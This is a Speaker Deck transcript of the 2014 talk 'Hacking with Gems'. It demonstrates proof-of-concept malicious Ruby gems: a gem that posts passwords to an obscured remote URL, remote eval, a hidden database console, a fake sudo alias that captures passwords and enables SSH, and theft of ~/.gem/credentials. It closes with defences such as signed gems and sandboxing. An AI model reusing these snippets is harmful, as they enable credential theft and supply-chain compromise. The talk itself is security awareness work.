Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Hacking with Gems (denver.rb)
Search
Benjamin Smith
August 13, 2014
Technology
0
160
Hacking with Gems (denver.rb)
Benjamin Smith
August 13, 2014
Tweet
Share
More Decks by Benjamin Smith
See All by Benjamin Smith
Modules instead of Microservies
benjaminleesmith
0
86
Refactoring Rails Apps with Engines
benjaminleesmith
4
840
How I architected my big Rails app for success! (ConFoo 2014)
benjaminleesmith
1
230
Hacking with Gems (ConFoo 2014)
benjaminleesmith
1
100
How I architected my big Rails app for success! (RubyConfAU 2014)
benjaminleesmith
2
380
How I architected my big Rails app for success! (RMR 2013)
benjaminleesmith
4
400
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
benjaminleesmith
1
220
Architecting your Rails app for success! (EuRuKo 2013)
benjaminleesmith
4
1.2k
Hacking with Gems (RuLu 2013)
benjaminleesmith
3
1.5k
Other Decks in Technology
See All in Technology
入社半年(合計1年)でGoogle Cloud 認定を全冠した秘訣🤫
risatube
0
150
【shownet.conf_】放送局とShowNetが共創する、未来の放送システム ~Media over IP 特別企画の裏側~
shownet
PRO
0
350
【shownet.conf_】持続可能な次世代Wi-Fi運用に向けて
shownet
PRO
0
350
リスクから学ぶKubernetesコンテナセキュリティ/k8s-risk-and-security
mochizuki875
1
320
スタサプ ForSCHOOLアプリのシンプルな設計
recruitengineers
PRO
3
520
AWSへのNIST SP800-171管理策 導入に向けての整備/20240930 Mitsutoshi Matsuo
shift_evolve
0
200
業務ヒアリングと知識の呪い
tamai_63
0
280
【shownet.conf_】クロージングセッション
shownet
PRO
0
300
【shownet.conf_】革新と伝統を融合したファシリティ
shownet
PRO
0
330
山手線一周のパフォーマンス改善
suzukahr
0
160
[JAWS-UG GameTech] 第6回 各種事例紹介_18TRIPにおけるAWSサービスを活用した負荷テスト・障害テスト
naoto_yasuda
0
160
【インフラエンジニアbooks】30分でわかる「AWS継続的セキュリティ実践ガイド」
hssh2_bin
4
1.6k
Featured
See All Featured
10 Git Anti Patterns You Should be Aware of
lemiorhan
653
59k
Ruby is Unlike a Banana
tanoku
96
11k
Code Review Best Practice
trishagee
62
16k
RailsConf 2023
tenderlove
28
840
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
39
2.1k
In The Pink: A Labor of Love
frogandcode
139
22k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
7
580
Dealing with People You Can't Stand - Big Design 2015
cassininazir
364
22k
Producing Creativity
orderedlist
PRO
341
39k
Optimising Largest Contentful Paint
csswizardry
31
2.8k
Faster Mobile Websites
deanohume
304
30k
Music & Morning Musume
bryan
46
6.1k
Transcript
Hacking with Gems Benjamin Smith @benjamin_smith
How to punk your friends with gems Benjamin Smith @benjamin_smith
How-to get rich quick and (maybe) not go to jail!
Benjamin Smith @benjamin_smith
Four reasons you should NOT trust Benjamin Smith @benjamin_smith
None
who i am
who i am
who i am
what i am NOT
None
please do not try this at home
please do not try this at home
None
None
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
once upon a time
GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview
(= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)
what’s the worst that could happen?
None
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
before... github.com/benjaminleesmith/awesome-rails-flash-messages
after! github.com/benjaminleesmith/awesome-rails-flash-messages
some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages
?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages
i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages
“development.log” ... "user"=>{"email"=>"
[email protected]
", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages
elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages
profit • Step 1: do something • Step 2: do
something else • Step 3: ???? • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country
a one way ticket to
that was easy. what else can I do?
gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector
show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
/users/sign_in github.com/benjaminleesmith/net_http_detector
/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector
hello db access! github.com/benjaminleesmith/net_http_detector
SELECT * FROM users; github.com/benjaminleesmith/net_http_detector
UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector
CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector
careful of wolves in sheep’s clothing
profit • Step 1: • Step 2: • Step 3:
• Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country
i like the beach
that was easy. what else can I do?
gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s
what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1
Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
None
what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s
better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0
8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s
behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar
-zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s
what what github.com/benjaminleesmith/better_date_to_s
i can haz source github.com/benjaminleesmith/better_date_to_s
truth time • this gem doesn't actually work • but
it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s
so much code so little time • Step 1: write
a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country
that was easy hard. what else can I do? (that's
easier)
gem install bunlder
gem install be_truthy github.com/benjaminleesmith/be_truthy
what it does > true.should be_true > User.new.should be_true >
User.new.should be_truthy github.com/benjaminleesmith/be_truthy
what it ACTUALLY does github.com/benjaminleesmith/be_truthy
github.com/benjaminleesmith/be_truthy
file tree looks ok github.com/benjaminleesmith/be_truthy
source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy
but what was this? github.com/benjaminleesmith/be_truthy
I see no C github.com/benjaminleesmith/be_truthy
run the what file? Gem::Specification.new do |gem| ... gem.extensions =
["Rakefile"] ... end github.com/benjaminleesmith/be_truthy
there is no Rakefile github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
what does the Rakefile do? github.com/benjaminleesmith/be_truthy
sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy
File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy
FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy
what does "sudo" do now? github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy
/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .
-passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy
Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy
ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy
take away: don't install ben's gems
None
how could I get you to install my gems?
what gems are trustworthy?
how can I add my code to already trusted gems?
back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip
).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
now I own your gems github.com/benjaminleesmith/be_truthy
> git clone your-gem-repo ...add a little code... > rake
build > gem push your-gem github.com/benjaminleesmith/be_truthy
do people trust your gems?
do people who install your gems have trustworthy gems?
None
there’s still one problem
bootstrapping
being popular sucks
conferences
social engineering
None
None
None
so what happens now?
ruby gems goes down
heroku deploys go down
i go to the beach
ruby gems goes down
heroku deploys go down
recovery
so what now?
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
Little Snitch obdev.at/products/littlesnitch/index.html
gem install be_truthy github.com/benjaminleesmith/be_truthy
fseventer fernlightning.com/doku.php?id=software:fseventer:start
don’t “gem install” from strangers
gem fetch vs gem install > gem fetch be_truthy >
gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
None
None
curl -sSL https://get.rvm.io | bash
gem install rails -P HighSecurity
> gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:
While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy
gem cert --build
https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html
sandboxing
github.com/rubygems/rubygems
tools to detect malicious code
private gem repos
do not try this at home
don't install gems you don't need to
pay attention to what your gems do
monitor your system
read the source
gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary
on install github.com/benjaminleesmith/coal-mine-canary
the results github.com/benjaminleesmith/coal-mine-canary
thank you!
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith